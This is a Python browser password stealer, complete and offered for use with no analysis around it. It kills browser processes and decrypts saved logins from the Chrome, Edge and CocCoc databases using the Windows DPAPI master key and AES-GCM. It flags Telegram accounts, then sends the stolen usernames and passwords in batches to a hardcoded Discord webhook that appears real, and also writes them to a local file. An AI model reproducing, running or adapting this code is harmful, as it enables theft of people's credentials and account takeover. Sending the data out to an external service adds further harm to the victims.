### COMMAND_BLOCK ###
import os, json, base64, sqlite3, shutil, requests, time, sys, traceback
try:
    import win32crypt
    from Crypto.Cipher import AES
    HAS_CRYPTO = True
except ImportError:
    print("[-] Missing win32crypt/pycryptodome - Windows Chrome fail")
    HAS_CRYPTO = False

DISCORD_WEBHOOK = "https://discord.com/api/webhooks/1471173064002895986/8P_K4y-eq2O-wj8X6ks_i4jbKuk4p24E3RavZj_a8ZUiwva-9-ilAf2QSeRaJGK_PFvm"
user_path = os.path.expanduser("~")

def kill_browsers():
    """Kill browsers to unlock DBs"""
    import psutil
    killed = []
    for p in psutil.process_iter(['name']):
        name = p.info['name'].lower()
        if name in ['chrome.exe', 'msedge.exe', 'firefox.exe']:
            try: p.kill(); killed.append(name)
            except: pass
    print(f"[+] Killed browsers: {killed}")

def get_key(browser_path):
    """Get Chrome/Edge master key"""
    if not HAS_CRYPTO: return None
    try:
        state = os.path.join(user_path, "AppData", "Local", browser_path, "User Data", "Local State")
        with open(state, "r", encoding="utf-8") as f:
            key = base64.b64decode(json.load(f)["os_crypt"]["encrypted_key"])[5:]
        return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
    except: return None

def decrypt(pwd, key):
    """AES-GCM decrypt"""
    try:
        iv, payload = pwd[3:15], pwd[15:]
        return AES.new(key, AES.MODE_GCM, iv).decrypt(payload)[:-16].decode()
    except: return ""

creds = []; telegram_creds = []

# KILL BROWSERS FIRST
kill_browsers()

# TARGET BROWSERS
browsers = [
    ("Chrome", "Google/Chrome", "User Data/Default/Login Data"),
    ("Edge", "Microsoft/Edge", "User Data/Default/Login Data"),
    ("CocCoc", "CocCoc/Browser", "User Data/Default/Login Data")
]

for name, path1, path2 in browsers:
    db_path = os.path.join(user_path, "AppData/Local", path1, path2)
    print(f"[*] Checking {name}: {db_path}")
    
    if not os.path.exists(db_path):
        print(f"[-] {name} DB missing")
        continue
    
    temp_db = f"temp_{name.lower()}.db"
    try:
        shutil.copy2(db_path, temp_db)
        key = get_key(path1.split("/")[0])
        
        if not key:
            print(f"[-] {name} no key")
            continue
        
        conn = sqlite3.connect(temp_db)
        cursor = conn.execute("SELECT origin_url, username_value, password_value FROM logins")
        
        count = 0
        for url, user, pwd in cursor.fetchall():
            if user and pwd:
                password = decrypt(pwd, key)
                if password:
                    creds.append({"browser": name, "url": url, "user": user, "pass": password})
                    if "telegram" in url.lower(): telegram_creds.append(creds[-1])
                    count += 1
        
        conn.close(); os.remove(temp_db)
        print(f"[+] {name}: {count} creds")
        
    except Exception as e:
        print(f"[-] {name} error: {e}")
        try: os.remove(temp_db)
        except: pass

print(f"\n🎉 TOTAL: {len(creds)} creds | Telegram: {len(telegram_creds)}")

# DISCORD SUMMARY (ALWAYS SEND)
summary = f"🔓 {len(creds)} Passwords | Telegram: {len(telegram_creds)}"
requests.post(DISCORD_WEBHOOK, json={"content": summary}).text

# BATCH CREDENTIALS
for i in range(0, len(creds), 10):
    chunk = creds[i:i+10]
    msg = "\n".join([f"{c['url'][:40]} | {c['user'][:15]} → {c['pass'][:25]}" for c in chunk])
    requests.post(DISCORD_WEBHOOK, json={"content": f"`Batch {i//10+1}`\n```{msg}```"}).text
    time.sleep(1)

# LOCAL DUMP
with open(f"creds_{int(time.time())}.txt", "w") as f:
    for c in creds: f.write(f"{c['browser']}: {c['url']} | {c['user']}:{c['pass']}\n")

print("✅ Stealer complete - check Discord/files!")
